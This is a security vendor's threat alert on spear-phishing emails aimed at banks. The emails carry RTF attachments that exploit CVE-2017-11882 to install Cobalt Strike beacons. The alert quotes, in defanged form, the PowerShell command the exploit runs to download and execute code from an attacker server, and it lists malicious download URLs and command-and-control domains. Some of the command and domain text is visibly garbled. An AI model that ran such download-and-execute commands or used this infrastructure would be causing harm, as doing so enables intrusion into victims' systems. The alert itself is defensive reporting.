Security Alert: Spoofing Attacks Targeting the Financial Sector

Security researchers recently analyzed several spam campaigns containing a form of Cobalt malware and discovered that the attackers have been using payloads to execute malicious actions.

Online criminals are taking advantage of a vulnerability found in Microsoft Office to spread malware by using a part of the penetration test tool called Cobalt Strike.

One of these spear phishing campaigns has been delivered with the following content (sanitized for your own protection).

Here’s how a spoofing email looks like:

From: [Spoof / Forwarded Sender Address]

Subject Line:
Request

Attached file:
Request.rtf

Source: CVE Details

The malicious actors are baiting victims with a malicious RTF document by using a Powershell payload to abuse the CVE-2017-11882 vulnerability. This security flaw has been an issue in the Office products for over 17 years, said a report from Security Week. Fortunately, it was patched by Microsoft last November during the company’s monthly security updates.

Basically, the bad guys are sending emails to potential victims with a spammy RTF document attached and labeled as “request”. If the computer isn’t properly updated, once they open the RTF document, it will create the following Powershell command:

PowerShell -nop -w hidden -c “IEX
¹⁾new object net.web_client) . download_string (‘http: //46.21.147 [.] 61: 80 / a’

Researchers found a similar spam campaign in which the same exploit and Powershell command were used, along with the following payload:

https: // bankosantantder [.] com / document / view / 1567 /
-> https: // service network update [.] com / a9lV

During their analysis, researchers discovered that the server to which the Powershell script connects is the owner of “Meter’s Reverse HTTPS Stager” from where the payload retrieves the malware infection (sanitized for your online safety):

https: // help desk oracle [.] com / Winn.

This page delivers the Cobalt Strike downloader that gives attackers easier access to the victim’s system. An obfuscated Javascript that acts as downloader is executed by using Microsoft HTML Application Host (mshta.exe) which is an important part of Windows located in the system folder.

The malicious code is then dropped on the victim’s system as [% APPDATA%] folder: [% random filename%]. Ps1 and performed to load both 32 and 64-bit versions of “Cobalt Strike Beacons” (as these files are named) which are loaded directly into memory.

From this time, the malware authors can control a victim’s system and execute a large array of commands using the PowerShell command-line tool.

This video shows how the Cobalt Strike Beacon is actually used.

After that, a .jar file (Java Archive) is downloaded and ran from the following URLs:

https: // servicenetupdate [.] com / a9lV
https: // bankosantantder [.] com / applet_signed.jar

Researchers believe that online criminals might have used this phishing campaign to target one important financial institution, the Santander Bank. The JAR file consists of two different DLL files that connect through rundll32.exe to the following C&C servers:

Oracle updateNews [.] com
Update Technews [.] com

These C&C servers might also be related to the same malicious actors:

Networks checker [.] com
Networks checker [.] networks
Global Medical trade [.] com
cobalt code [.] org (containing a fake page – see the image below)

Heimdal Security proactively blocked these infected domains, so all Heimdal™ Threat Prevention and Endpoint Security Suite users are protected.

According to VirusTotal, 25 antivirus engines out of 58 have detected this .jar archive as malicious.

As for the malicious RTF document, which triggers the infection via the targeted email campaign, it was detected by 24 antivirus products from 59 in VirusTotal at the time we published this alert.

Protection guide

This type of malware usually evades detection in the first place, so it’s vital to take all the security measures needed to keep your data safe.

• Update your Windows operating system NOW,  because there’s the first place where cyber criminals look for and exploit software vulnerabilities, just like it happened in these spam campaigns. Also, make sure all your apps and programs have the latest updates on your PC;
• Always have a backup with all your important data on external sources like a hard drive or in the cloud (Google Drive, Dropbox, etc.) to store it. Use this  guide to learn more;
• We’ll keep repeating it: Use strong and unique passwords to increase protection for your accounts. Our dedicated security guide will show you how to better manage your passwords;
• DO NOT open emails or click on attachments/files that look suspicious to you, because hackers will continue to use innovative methods to infect your computer;
• You know that prevention is the cure, so avoid visiting suspicious websites or downloading something from these sites. Also, access safe pages that use “https”;
• Make sure you have a reliable antivirus program installed on your computer to protect your valuable data from online threats;
• Also, it would be safer to add multiple layers of protection and use also a proactive cybersecurity software solution;
• Probably one of the best security measure you can use is learning how to easily detect such online threats. We recommend these free educational resources to gain more knowledge in the cybersecurity industry.

Malicious actors will always look for (software) vulnerabilities, whether are old or new, to exploit and use them in various spam campaigns like the ones shown above. Once again, it reminds us of the importance of software patching and why it is VITAL for everyone to keep their systems updated.

Stay safe!

If you liked this post, you will enjoy our newsletter.

Get cybersecurity updates you'll actually want to read directly in your inbox.

I agree to have the submitted data processed by Heimdal Security according to the Privacy Policy

*This article features cyber intelligence provided by CSIS Security Group researchers.